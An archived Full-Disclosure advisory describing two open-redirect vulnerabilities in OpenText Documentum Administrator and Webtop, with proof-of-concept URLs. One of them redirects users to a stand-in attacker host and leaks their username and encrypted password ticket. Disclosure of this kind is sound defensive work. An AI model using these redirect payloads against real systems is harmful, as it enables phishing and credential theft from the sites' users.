lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAM8W6xydCL==tqcxh9B0Orew1Nz+fz4MPpQOeERp7HXUaEeMSw@mail.gmail.com>
Date: Sun, 24 Sep 2017 11:48:42 +0200
From: Etnies <kuba25101990@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] OpenText Documentum Administrator and Webtop - Open Redirection

Title: OpenText Documentum Administrator and Webtop - Open Redirection
Author: Jakub Palaczynski
Date: 24. September 2017
CVE (Administrator): CVE-2017-14524
CVE (Webtop): CVE-2017-14525

Affected software:
==================
Documentum Administrator
Documentum Webtop

Exploit was tested on:
======================
Documentum Administrator version 7.2.0180.0055
Documentum Webtop version 6.8.0160.0073
Other versions may also be vulnerable.

Open Redirection - 2 instances:
========================

Please note that examples below are for Documentum Administrator, but
the same exploitation takes place in Webtop.

1. First instance:
It is possible to frame custom/malicious website on a trusted domain.
This way an attacker may for example steal credentials via creating
fake login form or redirect users to a malicious website.

Proof of Concept:
https://DOCUMENTUM/xda/help/en/default.htm?startat=//127.0.0.1/custom.html

2. Second instance:
It is possible to redirect user to custom website. Besides redirection
it also allows for stealing sensitive data - before redirection takes
place application appends username and base64 encoded user's encrypted
password ("ticket" parameter).

Proof of Concept:
Please note that PoC below works only in Internet Explorer browser as
only this browser treats /%09/ as //, which makes redirection work.
https://DOCUMENTUM/xda/component/virtuallinkconnect?redirectUrl=%2F%09%2Fattacker.com%2F&virtualLinkPath=%2F

Fix:
===
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
======
Jakub[dot]Palaczynski[at]gmail[dot]com

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ